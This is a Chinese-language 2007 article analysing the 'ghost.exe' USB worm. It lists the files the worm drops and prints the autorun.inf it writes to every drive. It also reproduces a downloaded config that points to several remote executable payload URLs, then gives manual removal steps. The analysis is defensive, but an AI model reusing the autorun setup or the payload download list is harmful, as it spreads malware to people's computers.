首页 | 手机 | 笔记本 | 硬件 | MP3 | 数码相机 | 品牌机 | 办公 | 网络 | 服务器 | 投影机 | 新闻 | 游戏 | 学院 | 下载 | 论坛 | 博客 | 商城 | 分站 | 北京 上海 广州 深圳
首页 >> 学院 >> 病毒与安全
ghost.exe U盘病毒详细介绍
2007-8-22 16:36:00 文/佚名 出处:论坛整理

  ghost.exe U盘病毒详细介绍

  运行ghost.exe 后生成
  ghost.exe.bat(删除自身)
  C:\WINDOWS\system\conime.exe
  C:\Program Files\WinRAR\WinRAR.exe.tmp

  每个盘符下释放(c d e f g h j k )
  autorun.inf
  ghost.exe

  autorun.inf 文件内容
  [AutoRun]
  OPEN=ghost.exe
  shellexecute=ghost.exe
  shell\打开(&O)\command=ghost.exe

  连入 http://www.dj916.com/ie.txt 下载
  ie.txt 内容
  [main]
  服务文件更新=5
  服务文件地址=http://www.86dy.net/c123.exe

  下载者是否更新=4
  下载个数=7

  文件1=http://222.220.16.185/data6/jwm.exe
  更新1=6
  文件2=http://222.220.16.185/data6/wol.exe
  更新2=6
  文件3=http://222.220.16.185/data6/wo3.exe
  更新3=6
  文件4=http://222.220.16.185/data6/mir.exe
  更新4=6
  文件5=http://222.220.16.185/data6/mhh.exe
  更新5=6
  文件6=http://222.220.16.181/ienet.exe
  更新6=6
  文件7=http://222.220.16.185/data6/zt3.exe
  更新7=6

  这些网址都是下载下来的病毒,没写入注册表,但是我用反汇编看了看这玩意应该修改了讯雷 QQ WINRAR 的注册表。

  处理方法(不包括下载下来的病毒)
  右键=>打开进入每个盘符=>删除
  autorun.inf
  ghost.exe

  删除文件
  C:\WINDOWS\system\conime.exe

  建议重装 qq 讯雷 WINRAR

  最后我还发现个玩意
  00407345 MOV EDX,123.004076B4 你好瑞星 我喜欢你~

  作者难不成暗恋瑞星??
看本文的网友还看了:
热点关注:
·视频教程中心
·AutoCAD 2007
·Dreamweaver8
·Photoshop CS3
·PS图层全知道
·Flash Action Script
·数码照片处理大全
最新教程>>>
·Photoshop CS3视频教程:Vista壁纸自己做
·视频教程 Photoshop超超级去水印法
·Dreamweaver视频教程-制作网站三大原则
·AutoCAD 2007中文版标准视频教程—初识三维部
·AutoCAD 2007中文版标准视频教程—端盖(2)
·AutoCAD 2007中文版标准视频教程—建筑平面图
·GoLive视频教程—使用CSS编辑器之一
·GoLive视频教程—通过CSS+DIV进行布局之一
·学院频道热门文章
·Photoshop抠出复杂背景下的乱发
·利用Photoshop光照滤镜打造太阳初升
·eMule电骡长时间下载到底伤不伤硬盘
·打造最强的IE IE6“丰满”完全手册
·能否王者归来?RealPlayer11抢先体验
·“覆水可收” PC数据保镖V2.0体验报告
· OpenOffice VS MS Office大比拼
·一个网站全搞定 在网页上使用QQ和MSN
·学院专题
·一起分享2007年上半年精彩大片
·炎炎夏日 极尽视听播放器专题
·装饰设计视频教程:建筑渲染技巧
·我型我show 桌面大师群英会
·维护系统用它们!系统工具视频教程专集
·今日推荐
·狂博之争 千元显卡浓度分析及消费指南
·百款笔记本直降千元 颐高暑促劲减风暴
·激情时尚之夜 摩托罗拉RAZR2发布盛典
·看酷睿文章 免费赢取奔腾E2140处理器
·我的坛子我做主 喷墨一体机版主挑战赛
2006 经营许可证编号: 粤B2-20050807